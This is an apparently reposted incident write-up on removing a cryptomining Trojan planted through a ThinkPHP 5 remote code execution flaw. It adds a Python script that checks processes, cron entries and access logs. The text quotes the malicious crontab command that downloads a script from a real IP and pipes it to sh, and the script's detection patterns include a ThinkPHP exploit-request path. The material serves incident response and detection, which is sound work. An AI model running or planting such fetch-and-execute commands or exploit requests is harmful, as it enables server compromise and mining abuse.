
Trojan removal experience: Dealing with a Trojan that exploited thinkphp5 remote code execution vulnerability

藏色散人 (forwarded)
2021-04-06 14:13:40

The following tutorial from the thinkphp column describes how to deal with a Trojan that exploited the thinkphp5 remote code execution vulnerability. I hope it helps those who need it!


Notes from a Trojan removal: dealing with a Trojan that exploited the thinkphp5 remote code execution vulnerability

Yesterday I noticed that a server had suddenly become slow. The top command showed several processes each using more than 100% CPU.

The command they were executing was:

/tmp/php  -s /tmp/p2.conf

It was almost certain that the server had been planted with a Trojan.

The next step was to determine the source.

The last command showed no login records.

I killed these processes first, but they reappeared after a few minutes.

Let's first see what this Trojan wants to do.

netstat showed that the Trojan had opened a port and established a connection to an IP address abroad.

But tcpdump did not capture any data transfer for a while.

What was it trying to do?

Continue checking the logs.

In the cron log I found that the www user had a scheduled crontab entry, which was basically the problem:

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1

I downloaded a few of the files and took a look. It appears to be a mining Trojan.

The www user on the server was created when lnmp was installed. Looking at the source, it is most likely a web vulnerability.

Checking the permissions, the php binary under /tmp is owned by www.

I checked the logs of several sites under lnmp and found that it was exploiting the recently disclosed remote code execution vulnerability in thinkphp 5.

Vulnerability details: https://nosec.org/home/detail/2050.html
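To make the three checks in this write-up repeatable, here is an added Python example (not from the original post or the simapple author). It runs the same triage over constructed sample data modelled on the post: processes whose executable lives in a world-writable temp directory, cron entries that pipe a download into a shell, and access-log requests carrying the ThinkPHP 5 controller-injection marker (a backslash-qualified \think\ namespace or invokefunction in the query string), which is the public signature of the vulnerability linked above. The post does not quote its own ps or log lines, so every sample line below is constructed; the IP address and crontab command are the ones the post reports.

```python
import re

# --- Constructed sample data (modelled on the post, not real captures) -----
PS_OUTPUT = """\
  PID USER     %CPU COMMAND
    1 root      0.0 /sbin/init
 1234 www      98.7 /tmp/php -s /tmp/p2.conf
 1235 www     101.2 /tmp/php -s /tmp/p2.conf
 1300 www       0.3 php-fpm: pool www
"""

CRON_LOG = """\
Apr  5 10:00:01 host CROND[2001]: (root) CMD (run-parts /etc/cron.hourly)
Apr  5 10:05:01 host CROND[2010]: (www) CMD (wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1)
"""

ACCESS_LOG = """\
10.0.0.5 - - [05/Apr/2021:09:58:12 +0800] "GET /index.php?s=index/index/index HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Apr/2021:09:59:40 +0800] "GET /index.php?s=index/\\think\\app/invokefunction HTTP/1.1" 200 128 "-" "python-requests/2.22"
"""

# --- Detection patterns ----------------------------------------------------
# Binaries executing from /tmp, /var/tmp or /dev/shm: legitimate services
# almost never live there, attacker droppers very often do.
TMP_EXEC = re.compile(r"^(/tmp|/var/tmp|/dev/shm)/")
# Download-and-pipe-to-shell, the shape of the crontab entry in the post.
PIPE_TO_SHELL = re.compile(r"(wget|curl)[^|]*\|\s*(sh|bash)\b")
# ThinkPHP 5 controller injection: a backslash (raw or %5C-encoded)
# namespace such as \think\app, or the invokefunction method name.
THINKPHP_RCE = re.compile(r"(\\|%5C)think(\\|%5C)|invokefunction", re.IGNORECASE)

CRON_RE = re.compile(r"CROND\[\d+\]: \((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)$")
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_processes(ps_text):
    """Return (pid, user, cpu, cmd) for processes running from a temp directory.

    Expects the output of: ps -eo pid,user,pcpu,args (header line included).
    """
    hits = []
    for line in ps_text.splitlines()[1:]:          # skip the header
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        pid, user, cpu, cmd = parts
        if TMP_EXEC.match(cmd.split()[0]):
            hits.append((int(pid), user, float(cpu), cmd))
    return hits


def suspicious_cron(cron_text):
    """Return (user, command) for cron jobs that pipe a download into a shell."""
    hits = []
    for line in cron_text.splitlines():
        m = CRON_RE.search(line)
        if m and PIPE_TO_SHELL.search(m.group("cmd")):
            hits.append((m.group("user"), m.group("cmd")))
    return hits


def thinkphp_rce_requests(access_text):
    """Return (ip, timestamp, path, status) for requests matching the RCE signature."""
    hits = []
    for line in access_text.splitlines():
        m = ACCESS_RE.match(line)
        if m and THINKPHP_RCE.search(m.group("path")):
            hits.append((m.group("ip"), m.group("ts"), m.group("path"), int(m.group("status"))))
    return hits


def triage(ps_text, cron_text, access_text):
    """Combine the three checks into one report dict."""
    return {
        "processes": suspicious_processes(ps_text),
        "cron": suspicious_cron(cron_text),
        "web": thinkphp_rce_requests(access_text),
    }


if __name__ == "__main__":
    for section, rows in triage(PS_OUTPUT, CRON_LOG, ACCESS_LOG).items():
        print(f"[{section}] {len(rows)} hit(s)")
        for row in rows:
            print("   ", row)
```

On a real host the three inputs would come from ps -eo pid,user,pcpu,args, /var/log/cron and the nginx access log of each lnmp site; a 200 response to a request carrying the signature is the line worth following up, since it means the request reached an unpatched ThinkPHP controller. The same check should be run against every vhost, including the ones on non-standard ports such as 8083.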

Fix the vulnerability and the problem is solved.

But this site is a test site listening on port 8083. Could it be that hackers are now probing non-standard ports as well?

Source: https://www.simapple.com/425.html



Statement:
This article is reproduced from simapple. If there is any infringement, please contact admin@php.cn to have it deleted.